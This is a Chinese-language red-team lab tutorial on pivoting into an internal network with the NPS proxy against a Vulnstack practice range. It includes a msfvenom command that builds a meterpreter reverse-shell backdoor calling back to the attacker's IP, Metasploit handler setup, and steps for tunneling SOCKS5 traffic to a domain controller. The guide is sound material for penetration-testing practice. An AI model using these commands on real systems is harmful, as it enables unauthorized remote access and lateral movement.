前言
前文(點我)主要介紹了如何在MSF上利用代理訪問到內網,而除了MSF之外還有許多現成的代理工具如Frp、NPS、EarthWorm、reGeorg等等,這些代理工具使用方法都大同小異,由於本人經常使用NPS,故下文主要演示一下NPS的使用。
NPS簡介
NPS是一款輕量級、高性能、功能強大的內網穿透代理服務器,它幾乎支持所有協議,其還支持內網http代理、內網socks5代理、p2p等等。NPS相比其他代理工具其具有簡潔且功能強大的WEB管理界面,支持服務端、客戶端同時控制,擴展功能強大。
下載地址
https://github.com/fatedier/frp
https://ehang-io.github.io/nps/#/ #官方使用文檔
這里存在對應版本的客戶端和服務端,可以都下載下來。

環境搭建
這里借助一個紅日團隊開源的一個紅隊實戰測試的部分來完成本次環境搭建,靶機下載地址如下:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
對本靶場環境做出一些修改之后,最終環境如下所示
黑客攻擊機:kali、windows10
網卡IP:192.168.178.128
網卡IP:192.168.178.1
Web服務器:windows7系統
外網網卡IP:192.168.178.133 內網網卡IP:192.168.52.143
域控服務器:windows server 2008系統
網卡IP:192.168.52.138
網絡互通狀況
kali、windows10可以ping通windows7的外網網卡,ping不通內網網卡
windows7可以ping通kali、windows10和windows server 2008
windows server 2008 ping不通windows7、kali和windows10
攻擊過程
首先我們通過windows7開放的Web服務先拿下Web服務器的權限,這里主要寫的是代理的知識,拿Web權限就不在過多闡述。

拿到Web權限之后,我們可以利用msfvenom生成一個后門,然后利用Web權限進行上傳。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.178.128 lport=4444 -f exe >shell.exe
上傳之后在kali上配置監聽,拿服務器權限。
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.178.128

然后我們可以把我們下載好的對應版本的NPS客戶端上傳到這台Web服務器上。
meterpreter > upload /root/桌面/windows_386_client/ c:\\

上傳好之后,我們可以在攻擊機windows10上啟動NPS服務端,首先以管理員權限啟動cmd,然后執行如下命令進行NPS的初始化安裝
D:\tools\nps\windows_386_server>nps install

然后啟動即可
D:\tools\nps\windows_386_server>nps.exe start
啟動好之后,我們可以輸入本地IP+8080端口進行訪問WEB客戶端
輸入默認賬號admin,密碼123進入管理頁面

進入管理頁面之后,我們可以新增一個客戶端

然后根據提示添加相關信息即可

添加好一個客戶端之后,我們可以在windwos7那台Web服務器上用我們之前上傳的NPS客戶端軟件進行連接,連接命令如下圖


執行命令之后,我們就可以回到我們的WEB界面,可以看到一個客戶端已經進行連接

連接成功之后,我們可以新增一個socks5的代理

配置好客戶端id,和服務端端口等信息(id為上圖中所創建的客戶端id號)

點擊新增后,即可發現已經創建號socks5的代理

那么接下來,我們可以通過這個socks5的代理,對內網windwos server 2008的服務器進行訪問一下。
我們可以利用SwitchyOmega配置socks5代理對內網中的windwos server 2008的Web服務進行訪問

添加代理后可以對windwos server 2008的Web服務進行正常訪問

當然我們還可以借助Proxifier這款軟件做一個socks5的全局代理


配置好之后,也可以對其進行訪問


